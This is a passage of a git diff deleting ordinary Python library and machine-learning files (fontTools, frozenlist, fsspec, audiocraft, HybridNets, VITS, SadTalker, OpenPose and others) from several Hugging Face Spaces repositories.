glyphID.split("#")[0] - if glyphID in agl.AGL2UV: - indices.append(agl.AGL2UV[glyphID]) - elif len(glyphID) == 7 and glyphID[:3] == "uni": - indices.append(int(glyphID[3:], 16)) - else: - indices.append(0xFFFF) - if sys.byteorder != "big": - indices.byteswap() - return indices.tobytes() - - def toXML(self, writer, ttFont): - formatstring, names, fixes = sstruct.getformat(postFormat) - for name in names: - value = getattr(self, name) - writer.simpletag(name, value=value) - writer.newline() - if hasattr(self, "mapping"): - writer.begintag("psNames") - writer.newline() - writer.comment( - "This file uses unique glyph names based on the information\n" - "found in the 'post' table. Since these names might not be unique,\n" - "we have to invent artificial names in case of clashes. In order to\n" - "be able to retain the original information, we need a name to\n" - "ps name mapping for those cases where they differ. That's what\n" - "you see below.\n" - ) - writer.newline() - items = sorted(self.mapping.items()) - for name, psName in items: - writer.simpletag("psName", name=name, psName=psName) - writer.newline() - writer.endtag("psNames") - writer.newline() - if hasattr(self, "extraNames"): - writer.begintag("extraNames") - writer.newline() - writer.comment( - "following are the name that are not taken from the standard Mac glyph order" - ) - writer.newline() - for name in self.extraNames: - writer.simpletag("psName", name=name) - writer.newline() - writer.endtag("extraNames") - writer.newline() - if hasattr(self, "data"): - writer.begintag("hexdata") - writer.newline() - writer.dumphex(self.data) - writer.endtag("hexdata") - writer.newline() - - def fromXML(self, name, attrs, content, ttFont): - if name not in ("psNames", "extraNames", "hexdata"): - setattr(self, name, safeEval(attrs["value"])) - elif name == "psNames": - self.mapping = {} - for element in content: - if not isinstance(element, tuple): - continue - name, attrs, content = element - if name == "psName": - self.mapping[attrs["name"]] = attrs["psName"] - elif name == "extraNames": - self.extraNames = [] - for element in content: - if not isinstance(element, tuple): - continue - name, attrs, content = element - if name == "psName": - self.extraNames.append(attrs["name"]) - else: - self.data = readHex(content) - - -def unpackPStrings(data, n): - # extract n Pascal strings from data. - # if there is not enough data, use "" - - strings = [] - index = 0 - dataLen = len(data) - - for _ in range(n): - if dataLen <= index: - length = 0 - else: - length = byteord(data[index]) - index += 1 - - if dataLen <= index + length - 1: - name = "" - else: - name = tostr(data[index : index + length], encoding="latin1") - strings.append(name) - index += length - - if index < dataLen: - log.warning("%d extra bytes in post.stringData array", dataLen - index) - - elif dataLen < index: - log.warning("not enough data in post.stringData array") - - return strings - - -def packPStrings(strings): - data = b"" - for s in strings: - data = data + bytechr(len(s)) + tobytes(s, encoding="latin1") - return data diff --git a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/frozenlist/__init__.py b/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/frozenlist/__init__.py deleted file mode 100644 index 152356588d3e619bddb7e2ecd76b147a4e55a96c..0000000000000000000000000000000000000000 --- a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/frozenlist/__init__.py +++ /dev/null @@ -1,95 +0,0 @@ -import os -import sys -import types -from collections.abc import MutableSequence -from functools import total_ordering -from typing import Type - -__version__ = "1.4.0" - -__all__ = ("FrozenList", "PyFrozenList") # type: Tuple[str, ...] - - -NO_EXTENSIONS = bool(os.environ.get("FROZENLIST_NO_EXTENSIONS")) # type: bool - - -@total_ordering -class FrozenList(MutableSequence): - __slots__ = ("_frozen", "_items") - - if sys.version_info >= (3, 9): - __class_getitem__ = classmethod(types.GenericAlias) - else: - - @classmethod - def __class_getitem__(cls: Type["FrozenList"]) -> Type["FrozenList"]: - return cls - - def __init__(self, items=None): - self._frozen = False - if items is not None: - items = list(items) - else: - items = [] - self._items = items - - @property - def frozen(self): - return self._frozen - - def freeze(self): - self._frozen = True - - def __getitem__(self, index): - return self._items[index] - - def __setitem__(self, index, value): - if self._frozen: - raise RuntimeError("Cannot modify frozen list.") - self._items[index] = value - - def __delitem__(self, index): - if self._frozen: - raise RuntimeError("Cannot modify frozen list.") - del self._items[index] - - def __len__(self): - return self._items.__len__() - - def __iter__(self): - return self._items.__iter__() - - def __reversed__(self): - return self._items.__reversed__() - - def __eq__(self, other): - return list(self) == other - - def __le__(self, other): - return list(self) <= other - - def insert(self, pos, item): - if self._frozen: - raise RuntimeError("Cannot modify frozen list.") - self._items.insert(pos, item) - - def __repr__(self): - return f"" - - def __hash__(self): - if self._frozen: - return hash(tuple(self)) - else: - raise RuntimeError("Cannot hash unfrozen list.") - - -PyFrozenList = FrozenList - - -try: - from ._frozenlist import FrozenList as CFrozenList # type: ignore - - if not NO_EXTENSIONS: # pragma: no cover - FrozenList = CFrozenList # type: ignore -except ImportError: # pragma: no cover - pass diff --git a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/fsspec/implementations/cache_metadata.py b/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/fsspec/implementations/cache_metadata.py deleted file mode 100644 index 16964c2a7153d40b480dd47513d1129ed27e307b..0000000000000000000000000000000000000000 --- a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/fsspec/implementations/cache_metadata.py +++ /dev/null @@ -1,232 +0,0 @@ -from __future__ import annotations - -import os -import pickle -import time -from typing import TYPE_CHECKING - -from fsspec.utils import atomic_write - -try: - import ujson as json -except ImportError: - if not TYPE_CHECKING: - import json - -if TYPE_CHECKING: - from typing import Any, Dict, Iterator, Literal - - from typing_extensions import TypeAlias - - from .cached import CachingFileSystem - - Detail: TypeAlias = Dict[str, Any] - - -class CacheMetadata: - """Cache metadata. - - All reading and writing of cache metadata is performed by this class, - accessing the cached files and blocks is not. - - Metadata is stored in a single file per storage directory in JSON format. - For backward compatibility, also reads metadata stored in pickle format - which is converted to JSON when next saved. - """ - - def __init__(self, storage: list[str]): - """ - - Parameters - ---------- - storage: list[str] - Directories containing cached files, must be at least one. Metadata - is stored in the last of these directories by convention. - """ - if not storage: - raise ValueError("CacheMetadata expects at least one storage location") - - self._storage = storage - self.cached_files: list[Detail] = [{}] - - # Private attribute to force saving of metadata in pickle format rather than - # JSON for use in tests to confirm can read both pickle and JSON formats. - self._force_save_pickle = False - - def _load(self, fn: str) -> Detail: - """Low-level function to load metadata from specific file""" - try: - with open(fn, "r") as f: - return json.load(f) - except ValueError: - with open(fn, "rb") as f: - return pickle.load(f) - - def _save(self, metadata_to_save: Detail, fn: str) -> None: - """Low-level function to save metadata to specific file""" - if self._force_save_pickle: - with atomic_write(fn) as f: - pickle.dump(metadata_to_save, f) - else: - with atomic_write(fn, mode="w") as f: - json.dump(metadata_to_save, f) - - def _scan_locations( - self, writable_only: bool = False - ) -> Iterator[tuple[str, str, bool]]: - """Yield locations (filenames) where metadata is stored, and whether - writable or not. - - Parameters - ---------- - writable: bool - Set to True to only yield writable locations. - - Returns - ------- - Yields (str, str, bool) - """ - n = len(self._storage) - for i, storage in enumerate(self._storage): - writable = i == n - 1 - if writable_only and not writable: - continue - yield os.path.join(storage, "cache"), storage, writable - - def check_file( - self, path: str, cfs: CachingFileSystem | None - ) -> Literal[False] | tuple[Detail, str]: - """If path is in cache return its details, otherwise return ``False``. - - If the optional CachingFileSystem is specified then it is used to - perform extra checks to reject possible matches, such as if they are - too old. - """ - for (fn, base, _), cache in zip(self._scan_locations(), self.cached_files): - if path not in cache: - continue - detail = cache[path].copy() - - if cfs is not None: - if cfs.check_files and detail["uid"] != cfs.fs.ukey(path): - # Wrong file as determined by hash of file properties - continue - if cfs.expiry and time.time() - detail["time"] > cfs.expiry: - # Cached file has expired - continue - - fn = os.path.join(base, detail["fn"]) - if os.path.exists(fn): - return detail, fn - return False - - def clear_expired(self, expiry_time: int) -> tuple[list[str], bool]: - """Remove expired metadata from the cache. - - Returns names of files corresponding to expired metadata and a boolean - flag indicating whether the writable cache is empty. Caller is - responsible for deleting the expired files. - """ - expired_files = [] - for path, detail in self.cached_files[-1].copy().items(): - if time.time() - detail["time"] > expiry_time: - fn = detail.get("fn", "") - if not fn: - raise RuntimeError( - f"Cache metadata does not contain 'fn' for {path}" - ) - fn = os.path.join(self._storage[-1], fn) - expired_files.append(fn) - self.cached_files[-1].pop(path) - - if self.cached_files[-1]: - cache_path = os.path.join(self._storage[-1], "cache") - self._save(self.cached_files[-1], cache_path) - - writable_cache_empty = not self.cached_files[-1] - return expired_files, writable_cache_empty - - def load(self) -> None: - """Load all metadata from disk and store in ``self.cached_files``""" - cached_files = [] - for fn, _, _ in self._scan_locations(): - if os.path.exists(fn): - # TODO: consolidate blocks here - loaded_cached_files = self._load(fn) - for c in loaded_cached_files.values(): - if isinstance(c["blocks"], list): - c["blocks"] = set(c["blocks"]) - cached_files.append(loaded_cached_files) - else: - cached_files.append({}) - self.cached_files = cached_files or [{}] - - def on_close_cached_file(self, f: Any, path: str) -> None: - """Perform side-effect actions on closing a cached file. - - The actual closing of the file is the responsibility of the caller. - """ - # File must be writeble, so in self.cached_files[-1] - c = self.cached_files[-1][path] - if c["blocks"] is not True and len(c["blocks"]) * f.blocksize >= f.size: - c["blocks"] = True - - def pop_file(self, path: str) -> str | None: - """Remove metadata of cached file. - - If path is in the cache, return the filename of the cached file, - otherwise return ``None``. Caller is responsible for deleting the - cached file. - """ - details = self.check_file(path, None) - if not details: - return None - _, fn = details - if fn.startswith(self._storage[-1]): - self.cached_files[-1].pop(path) - self.save() - else: - raise PermissionError( - "Can only delete cached file in last, writable cache location" - ) - return fn - - def save(self) -> None: - """Save metadata to disk""" - for (fn, _, writable), cache in zip(self._scan_locations(), self.cached_files): - if not writable: - continue - - if os.path.exists(fn): - cached_files = self._load(fn) - for k, c in cached_files.items(): - if k in cache: - if c["blocks"] is True or cache[k]["blocks"] is True: - c["blocks"] = True - else: - # self.cached_files[*][*]["blocks"] must continue to - # point to the same set object so that updates - # performed by MMapCache are propagated back to - # self.cached_files. - blocks = cache[k]["blocks"] - blocks.update(c["blocks"]) - c["blocks"] = blocks - c["time"] = max(c["time"], cache[k]["time"]) - c["uid"] = cache[k]["uid"] - - # Files can be added to cache after it was written once - for k, c in cache.items(): - if k not in cached_files: - cached_files[k] = c - else: - cached_files = cache - cache = {k: v.copy() for k, v in cached_files.items()} - for c in cache.values(): - if isinstance(c["blocks"], set): - c["blocks"] = list(c["blocks"]) - self._save(cache, fn) - self.cached_files[-1] = cached_files - - def update_file(self, path: str, detail: Detail) -> None: - """Update metadata for specific file in memory, do not save""" - self.cached_files[-1][path] = detail diff --git a/spaces/jordonpeter01/MusicGen2/audiocraft/quantization/vq.py b/spaces/jordonpeter01/MusicGen2/audiocraft/quantization/vq.py deleted file mode 100644 index f67c3a0cd30d4b8993a36c587f00dc8a451d926f..0000000000000000000000000000000000000000 --- a/spaces/jordonpeter01/MusicGen2/audiocraft/quantization/vq.py +++ /dev/null @@ -1,116 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -import math -import typing as tp - -import torch - -from .base import BaseQuantizer, QuantizedResult -from .core_vq import ResidualVectorQuantization - - -class ResidualVectorQuantizer(BaseQuantizer): - """Residual Vector Quantizer. - - Args: - dimension (int): Dimension of the codebooks. - n_q (int): Number of residual vector quantizers used. - q_dropout (bool): Random quantizer drop out at train time. - bins (int): Codebook size. - decay (float): Decay for exponential moving average over the codebooks. - kmeans_init (bool): Whether to use kmeans to initialize the codebooks. - kmeans_iters (int): Number of iterations used for kmeans initialization. - threshold_ema_dead_code (int): Threshold for dead code expiration. Replace any codes - that have an exponential moving average cluster size less than the specified threshold with - randomly selected vector from the current batch. - orthogonal_reg_weight (float): Orthogonal regularization weights. - orthogonal_reg_active_codes_only (bool): Apply orthogonal regularization only on active codes. - orthogonal_reg_max_codes (optional int): Maximum number of codes to consider. - for orthogonal regulariation. - """ - def __init__( - self, - dimension: int = 256, - n_q: int = 8, - q_dropout: bool = False, - bins: int = 1024, - decay: float = 0.99, - kmeans_init: bool = True, - kmeans_iters: int = 10, - threshold_ema_dead_code: int = 2, - orthogonal_reg_weight: float = 0.0, - orthogonal_reg_active_codes_only: bool = False, - orthogonal_reg_max_codes: tp.Optional[int] = None, - ): - super().__init__() - self.max_n_q = n_q - self.n_q = n_q - self.q_dropout = q_dropout - self.dimension = dimension - self.bins = bins - self.decay = decay - self.kmeans_init = kmeans_init - self.kmeans_iters = kmeans_iters - self.threshold_ema_dead_code = threshold_ema_dead_code - self.orthogonal_reg_weight = orthogonal_reg_weight - self.orthogonal_reg_active_codes_only = orthogonal_reg_active_codes_only - self.orthogonal_reg_max_codes = orthogonal_reg_max_codes - self.vq = ResidualVectorQuantization( - dim=self.dimension, - codebook_size=self.bins, - num_quantizers=self.n_q, - decay=self.decay, - kmeans_init=self.kmeans_init, - kmeans_iters=self.kmeans_iters, - threshold_ema_dead_code=self.threshold_ema_dead_code, - orthogonal_reg_weight=self.orthogonal_reg_weight, - orthogonal_reg_active_codes_only=self.orthogonal_reg_active_codes_only, - orthogonal_reg_max_codes=self.orthogonal_reg_max_codes, - channels_last=False - ) - - def forward(self, x: torch.Tensor, frame_rate: int): - n_q = self.n_q - if self.training and self.q_dropout: - n_q = int(torch.randint(1, self.n_q + 1, (1,)).item()) - bw_per_q = math.log2(self.bins) * frame_rate / 1000 - quantized, codes, commit_loss = self.vq(x, n_q=n_q) - codes = codes.transpose(0, 1) - # codes is [B, K, T], with T frames, K nb of codebooks. - bw = torch.tensor(n_q * bw_per_q).to(x) - return QuantizedResult(quantized, codes, bw, penalty=torch.mean(commit_loss)) - - def encode(self, x: torch.Tensor) -> torch.Tensor: - """Encode a given input tensor with the specified frame rate at the given bandwidth. - The RVQ encode method sets the appropriate number of quantizer to use - and returns indices for each quantizer. - """ - n_q = self.n_q - codes = self.vq.encode(x, n_q=n_q) - codes = codes.transpose(0, 1) - # codes is [B, K, T], with T frames, K nb of codebooks. - return codes - - def decode(self, codes: torch.Tensor) -> torch.Tensor: - """Decode the given codes to the quantized representation. - """ - # codes is [B, K, T], with T frames, K nb of codebooks, vq.decode expects [K, B, T]. - codes = codes.transpose(0, 1) - quantized = self.vq.decode(codes) - return quantized - - @property - def total_codebooks(self): - return self.max_n_q - - @property - def num_codebooks(self): - return self.n_q - - def set_num_codebooks(self, n: int): - assert n > 0 and n <= self.max_n_q - self.n_q = n diff --git a/spaces/josedolot/HybridNet_Demo2/hubconf.py b/spaces/josedolot/HybridNet_Demo2/hubconf.py deleted file mode 100644 index d67f48e4017d33657a077bc6f3d650ff49d6ee99..0000000000000000000000000000000000000000 --- a/spaces/josedolot/HybridNet_Demo2/hubconf.py +++ /dev/null @@ -1,37 +0,0 @@ -dependencies = ["efficientnet_pytorch", "pretrainedmodels", - "timm", "torch", "torchvision"] -import torch -from utils.utils import Params -from backbone import HybridNetsBackbone -from pathlib import Path -import os - - -def hybridnets(pretrained=True, compound_coef=3, device='cpu'): - """Creates a HybridNets model - - Arguments: - pretrained (bool): load pretrained weights into the model - compound_coef (int): compound coefficient of efficientnet backbone - device (str): 'cuda:0' or 'cpu' - - Returns: - HybridNets model - """ - params = Params(os.path.join(Path(__file__).resolve().parent, "projects/bdd100k.yml")) - model = HybridNetsBackbone(num_classes=len(params.obj_list), compound_coef=compound_coef, - ratios=eval(params.anchors_ratios), scales=eval(params.anchors_scales), - seg_classes=len(params.seg_list)) - if pretrained and compound_coef == 3: - weight_url = 'https://github.com/datvuthanh/HybridNets/releases/download/v1.0/hybridnets.pth' - model.load_state_dict(torch.hub.load_state_dict_from_url(weight_url, map_location=device)) - model = model.to(device) - return model - - -if __name__ == "__main__": - model = hybridnets(device='cpu') - img = torch.rand(1, 3, 384, 640) - - result = model(img) - print(result) diff --git a/spaces/jykoh/fromage/README.md b/spaces/jykoh/fromage/README.md deleted file mode 100644 index 173045e8a1ce493f5018d8f3e345929f44175938..0000000000000000000000000000000000000000 --- a/spaces/jykoh/fromage/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: FROMAGe -emoji: 🧀 -sdk: docker -app_file: app.py -colorFrom: blue -colorTo: red -pinned: true -tags: - - multimodal - - computer-vision - - nlp ---- \ No newline at end of file diff --git a/spaces/kangvcar/RealChar/alembic/versions/ead242c61258_added_user_table.py b/spaces/kangvcar/RealChar/alembic/versions/ead242c61258_added_user_table.py deleted file mode 100644 index 100bf96f2e8487a4e3376672472b6dda52ab0ce1..0000000000000000000000000000000000000000 --- a/spaces/kangvcar/RealChar/alembic/versions/ead242c61258_added_user_table.py +++ /dev/null @@ -1,32 +0,0 @@ -"""Added user table - -Revision ID: ead242c61258 -Revises: -Create Date: 2023-06-26 16:25:00.614978 - -""" -from alembic import op -import sqlalchemy as sa - - -# revision identifiers, used by Alembic. -revision = 'ead242c61258' -down_revision = None -branch_labels = None -depends_on = None - - -def upgrade() -> None: - op.create_table('users', - sa.Column('id', sa.Integer(), primary_key=True), - sa.Column('name', sa.String(), nullable=True), - sa.Column('email', sa.String(), - nullable=False, unique=True), - sa.PrimaryKeyConstraint('id') - ) - op.create_index(op.f('ix_users_email'), 'users', ['email'], unique=True) - - -def downgrade() -> None: - op.drop_index(op.f('ix_users_email'), table_name='users') - op.drop_table('users') diff --git a/spaces/kausmos/clothsy/utils/similarity.py b/spaces/kausmos/clothsy/utils/similarity.py deleted file mode 100644 index 12b5b8efa7442f4933b3b65af6715f1a4a5218da..0000000000000000000000000000000000000000 --- a/spaces/kausmos/clothsy/utils/similarity.py +++ /dev/null @@ -1,27 +0,0 @@ -from sentence_transformers import SentenceTransformer, util -import pandas as pd -import numpy as np - -clothing_data = pd.read_csv('data/clothing_data_preprocessed.csv') - -model = SentenceTransformer('model') -embeddings = np.load('data/embeddings.npy') - -def get_similar_items(query, embeddings, clothing_data, top_k): - # Encode the query text - query_embedding = model.encode([query], convert_to_tensor=True) - # Compute similarity scores - similarity_scores = util.pytorch_cos_sim(query_embedding, embeddings)[0] - # Sort indices based on similarity scores - sorted_indices = similarity_scores.argsort(descending=True) - # Get the top-k most similar indices - similar_indices = sorted_indices[:top_k].cpu().numpy() - # Get the URLs of the top-k similar items - similar_urls = clothing_data.loc[similar_indices, 'url'].tolist() - - return similar_urls - -# Assuming you have the embeddings and clothing_data available -query = "Men's jeans black color" -similar_urls = get_similar_items(query, embeddings, clothing_data, top_k=5) -print(similar_urls) \ No newline at end of file diff --git a/spaces/kcagle/AutoGPT/autogpt/commands/analyze_code.py b/spaces/kcagle/AutoGPT/autogpt/commands/analyze_code.py deleted file mode 100644 index e02ea4c5b4ba53530e559d1cab7a07b8e3c7c638..0000000000000000000000000000000000000000 --- a/spaces/kcagle/AutoGPT/autogpt/commands/analyze_code.py +++ /dev/null @@ -1,25 +0,0 @@ -"""Code evaluation module.""" -from __future__ import annotations - -from autogpt.llm_utils import call_ai_function - - -def analyze_code(code: str) -> list[str]: - """ - A function that takes in a string and returns a response from create chat - completion api call. - - Parameters: - code (str): Code to be evaluated. - Returns: - A result string from create chat completion. A list of suggestions to - improve the code. - """ - - function_string = "def analyze_code(code: str) -> List[str]:" - args = [code] - description_string = ( - "Analyzes the given code and returns a list of suggestions" " for improvements." - ) - - return call_ai_function(function_string, args, description_string) diff --git a/spaces/kdrkdrkdr/HutaoTTS/README.md b/spaces/kdrkdrkdr/HutaoTTS/README.md deleted file mode 100644 index dcd14051d2c998249025ebe87f43a9eaf71276af..0000000000000000000000000000000000000000 --- a/spaces/kdrkdrkdr/HutaoTTS/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: HutaoTTS -emoji: 📈 -colorFrom: pink -colorTo: gray -sdk: gradio -sdk_version: 3.12.0 -app_file: app.py -pinned: false -license: mit ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/kdrkdrkdr/ProsekaTTS/commons.py b/spaces/kdrkdrkdr/ProsekaTTS/commons.py deleted file mode 100644 index 40fcc05364d4815971f5c6f9dbb8dcef8e3ec1e9..0000000000000000000000000000000000000000 --- a/spaces/kdrkdrkdr/ProsekaTTS/commons.py +++ /dev/null @@ -1,172 +0,0 @@ -import math -import torch -from torch.nn import functional as F -import torch.jit - - -def script_method(fn, _rcb=None): - return fn - - -def script(obj, optimize=True, _frames_up=0, _rcb=None): - return obj - - -torch.jit.script_method = script_method -torch.jit.script = script - - -def init_weights(m, mean=0.0, std=0.01): - classname = m.__class__.__name__ - if classname.find("Conv") != -1: - m.weight.data.normal_(mean, std) - - -def get_padding(kernel_size, dilation=1): - return int((kernel_size*dilation - dilation)/2) - - -def convert_pad_shape(pad_shape): - l = pad_shape[::-1] - pad_shape = [item for sublist in l for item in sublist] - return pad_shape - - -def intersperse(lst, item): - result = [item] * (len(lst) * 2 + 1) - result[1::2] = lst - return result - - -def kl_divergence(m_p, logs_p, m_q, logs_q): - """KL(P||Q)""" - kl = (logs_q - logs_p) - 0.5 - kl += 0.5 * (torch.exp(2. * logs_p) + ((m_p - m_q)**2)) * torch.exp(-2. * logs_q) - return kl - - -def rand_gumbel(shape): - """Sample from the Gumbel distribution, protect from overflows.""" - uniform_samples = torch.rand(shape) * 0.99998 + 0.00001 - return -torch.log(-torch.log(uniform_samples)) - - -def rand_gumbel_like(x): - g = rand_gumbel(x.size()).to(dtype=x.dtype, device=x.device) - return g - - -def slice_segments(x, ids_str, segment_size=4): - ret = torch.zeros_like(x[:, :, :segment_size]) - for i in range(x.size(0)): - idx_str = ids_str[i] - idx_end = idx_str + segment_size - ret[i] = x[i, :, idx_str:idx_end] - return ret - - -def rand_slice_segments(x, x_lengths=None, segment_size=4): - b, d, t = x.size() - if x_lengths is None: - x_lengths = t - ids_str_max = x_lengths - segment_size + 1 - ids_str = (torch.rand([b]).to(device=x.device) * ids_str_max).to(dtype=torch.long) - ret = slice_segments(x, ids_str, segment_size) - return ret, ids_str - - -def get_timing_signal_1d( - length, channels, min_timescale=1.0, max_timescale=1.0e4): - position = torch.arange(length, dtype=torch.float) - num_timescales = channels // 2 - log_timescale_increment = ( - math.log(float(max_timescale) / float(min_timescale)) / - (num_timescales - 1)) - inv_timescales = min_timescale * torch.exp( - torch.arange(num_timescales, dtype=torch.float) * -log_timescale_increment) - scaled_time = position.unsqueeze(0) * inv_timescales.unsqueeze(1) - signal = torch.cat([torch.sin(scaled_time), torch.cos(scaled_time)], 0) - signal = F.pad(signal, [0, 0, 0, channels % 2]) - signal = signal.view(1, channels, length) - return signal - - -def add_timing_signal_1d(x, min_timescale=1.0, max_timescale=1.0e4): - b, channels, length = x.size() - signal = get_timing_signal_1d(length, channels, min_timescale, max_timescale) - return x + signal.to(dtype=x.dtype, device=x.device) - - -def cat_timing_signal_1d(x, min_timescale=1.0, max_timescale=1.0e4, axis=1): - b, channels, length = x.size() - signal = get_timing_signal_1d(length, channels, min_timescale, max_timescale) - return torch.cat([x, signal.to(dtype=x.dtype, device=x.device)], axis) - - -def subsequent_mask(length): - mask = torch.tril(torch.ones(length, length)).unsqueeze(0).unsqueeze(0) - return mask - - -@torch.jit.script -def fused_add_tanh_sigmoid_multiply(input_a, input_b, n_channels): - n_channels_int = n_channels[0] - in_act = input_a + input_b - t_act = torch.tanh(in_act[:, :n_channels_int, :]) - s_act = torch.sigmoid(in_act[:, n_channels_int:, :]) - acts = t_act * s_act - return acts - - -def convert_pad_shape(pad_shape): - l = pad_shape[::-1] - pad_shape = [item for sublist in l for item in sublist] - return pad_shape - - -def shift_1d(x): - x = F.pad(x, convert_pad_shape([[0, 0], [0, 0], [1, 0]]))[:, :, :-1] - return x - - -def sequence_mask(length, max_length=None): - if max_length is None: - max_length = length.max() - x = torch.arange(max_length, dtype=length.dtype, device=length.device) - return x.unsqueeze(0) < length.unsqueeze(1) - - -def generate_path(duration, mask): - """ - duration: [b, 1, t_x] - mask: [b, 1, t_y, t_x] - """ - device = duration.device - - b, _, t_y, t_x = mask.shape - cum_duration = torch.cumsum(duration, -1) - - cum_duration_flat = cum_duration.view(b * t_x) - path = sequence_mask(cum_duration_flat, t_y).to(mask.dtype) - path = path.view(b, t_x, t_y) - path = path - F.pad(path, convert_pad_shape([[0, 0], [1, 0], [0, 0]]))[:, :-1] - path = path.unsqueeze(1).transpose(2,3) * mask - return path - - -def clip_grad_value_(parameters, clip_value, norm_type=2): - if isinstance(parameters, torch.Tensor): - parameters = [parameters] - parameters = list(filter(lambda p: p.grad is not None, parameters)) - norm_type = float(norm_type) - if clip_value is not None: - clip_value = float(clip_value) - - total_norm = 0 - for p in parameters: - param_norm = p.grad.data.norm(norm_type) - total_norm += param_norm.item() ** norm_type - if clip_value is not None: - p.grad.data.clamp_(min=-clip_value, max=clip_value) - total_norm = total_norm ** (1. / norm_type) - return total_norm diff --git a/spaces/kevinwang676/ChatGLM2-VC-SadTalker/src/audio2pose_models/audio2pose.py b/spaces/kevinwang676/ChatGLM2-VC-SadTalker/src/audio2pose_models/audio2pose.py deleted file mode 100644 index 2b8cd1427038460a7679260a424d2f01d2bcf2c5..0000000000000000000000000000000000000000 --- a/spaces/kevinwang676/ChatGLM2-VC-SadTalker/src/audio2pose_models/audio2pose.py +++ /dev/null @@ -1,94 +0,0 @@ -import torch -from torch import nn -from src.audio2pose_models.cvae import CVAE -from src.audio2pose_models.discriminator import PoseSequenceDiscriminator -from src.audio2pose_models.audio_encoder import AudioEncoder - -class Audio2Pose(nn.Module): - def __init__(self, cfg, wav2lip_checkpoint, device='cuda'): - super().__init__() - self.cfg = cfg - self.seq_len = cfg.MODEL.CVAE.SEQ_LEN - self.latent_dim = cfg.MODEL.CVAE.LATENT_SIZE - self.device = device - - self.audio_encoder = AudioEncoder(wav2lip_checkpoint, device) - self.audio_encoder.eval() - for param in self.audio_encoder.parameters(): - param.requires_grad = False - - self.netG = CVAE(cfg) - self.netD_motion = PoseSequenceDiscriminator(cfg) - - - def forward(self, x): - - batch = {} - coeff_gt = x['gt'].cuda().squeeze(0) #bs frame_len+1 73 - batch['pose_motion_gt'] = coeff_gt[:, 1:, 64:70] - coeff_gt[:, :1, 64:70] #bs frame_len 6 - batch['ref'] = coeff_gt[:, 0, 64:70] #bs 6 - batch['class'] = x['class'].squeeze(0).cuda() # bs - indiv_mels= x['indiv_mels'].cuda().squeeze(0) # bs seq_len+1 80 16 - - # forward - audio_emb_list = [] - audio_emb = self.audio_encoder(indiv_mels[:, 1:, :, :].unsqueeze(2)) #bs seq_len 512 - batch['audio_emb'] = audio_emb - batch = self.netG(batch) - - pose_motion_pred = batch['pose_motion_pred'] # bs frame_len 6 - pose_gt = coeff_gt[:, 1:, 64:70].clone() # bs frame_len 6 - pose_pred = coeff_gt[:, :1, 64:70] + pose_motion_pred # bs frame_len 6 - - batch['pose_pred'] = pose_pred - batch['pose_gt'] = pose_gt - - return batch - - def test(self, x): - - batch = {} - ref = x['ref'] #bs 1 70 - batch['ref'] = x['ref'][:,0,-6:] - batch['class'] = x['class'] - bs = ref.shape[0] - - indiv_mels= x['indiv_mels'] # bs T 1 80 16 - indiv_mels_use = indiv_mels[:, 1:] # we regard the ref as the first frame - num_frames = x['num_frames'] - num_frames = int(num_frames) - 1 - - # - div = num_frames//self.seq_len - re = num_frames%self.seq_len - audio_emb_list = [] - pose_motion_pred_list = [torch.zeros(batch['ref'].unsqueeze(1).shape, dtype=batch['ref'].dtype, - device=batch['ref'].device)] - - for i in range(div): - z = torch.randn(bs, self.latent_dim).to(ref.device) - batch['z'] = z - audio_emb = self.audio_encoder(indiv_mels_use[:, i*self.seq_len:(i+1)*self.seq_len,:,:,:]) #bs seq_len 512 - batch['audio_emb'] = audio_emb - batch = self.netG.test(batch) - pose_motion_pred_list.append(batch['pose_motion_pred']) #list of bs seq_len 6 - - if re != 0: - z = torch.randn(bs, self.latent_dim).to(ref.device) - batch['z'] = z - audio_emb = self.audio_encoder(indiv_mels_use[:, -1*self.seq_len:,:,:,:]) #bs seq_len 512 - if audio_emb.shape[1] != self.seq_len: - pad_dim = self.seq_len-audio_emb.shape[1] - pad_audio_emb = audio_emb[:, :1].repeat(1, pad_dim, 1) - audio_emb = torch.cat([pad_audio_emb, audio_emb], 1) - batch['audio_emb'] = audio_emb - batch = self.netG.test(batch) - pose_motion_pred_list.append(batch['pose_motion_pred'][:,-1*re:,:]) - - pose_motion_pred = torch.cat(pose_motion_pred_list, dim = 1) - batch['pose_motion_pred'] = pose_motion_pred - - pose_pred = ref[:, :1, -6:] + pose_motion_pred # bs T 6 - - batch['pose_pred'] = pose_pred - return batch diff --git a/spaces/kirch/Text2Video-Zero/annotator/openpose/body.py b/spaces/kirch/Text2Video-Zero/annotator/openpose/body.py deleted file mode 100644 index 7c3cf7a388b4ac81004524e64125e383bdd455bd..0000000000000000000000000000000000000000 --- a/spaces/kirch/Text2Video-Zero/annotator/openpose/body.py +++ /dev/null @@ -1,219 +0,0 @@ -import cv2 -import numpy as np -import math -import time -from scipy.ndimage.filters import gaussian_filter -import matplotlib.pyplot as plt -import matplotlib -import torch -from torchvision import transforms - -from . import util -from .model import bodypose_model - -class Body(object): - def __init__(self, model_path): - self.model = bodypose_model() - if torch.cuda.is_available(): - self.model = self.model.cuda() - print('cuda') - model_dict = util.transfer(self.model, torch.load(model_path)) - self.model.load_state_dict(model_dict) - self.model.eval() - - def __call__(self, oriImg): - # scale_search = [0.5, 1.0, 1.5, 2.0] - scale_search = [0.5] - boxsize = 368 - stride = 8 - padValue = 128 - thre1 = 0.1 - thre2 = 0.05 - multiplier = [x * boxsize / oriImg.shape[0] for x in scale_search] - heatmap_avg = np.zeros((oriImg.shape[0], oriImg.shape[1], 19)) - paf_avg = np.zeros((oriImg.shape[0], oriImg.shape[1], 38)) - - for m in range(len(multiplier)): - scale = multiplier[m] - imageToTest = cv2.resize(oriImg, (0, 0), fx=scale, fy=scale, interpolation=cv2.INTER_CUBIC) - imageToTest_padded, pad = util.padRightDownCorner(imageToTest, stride, padValue) - im = np.transpose(np.float32(imageToTest_padded[:, :, :, 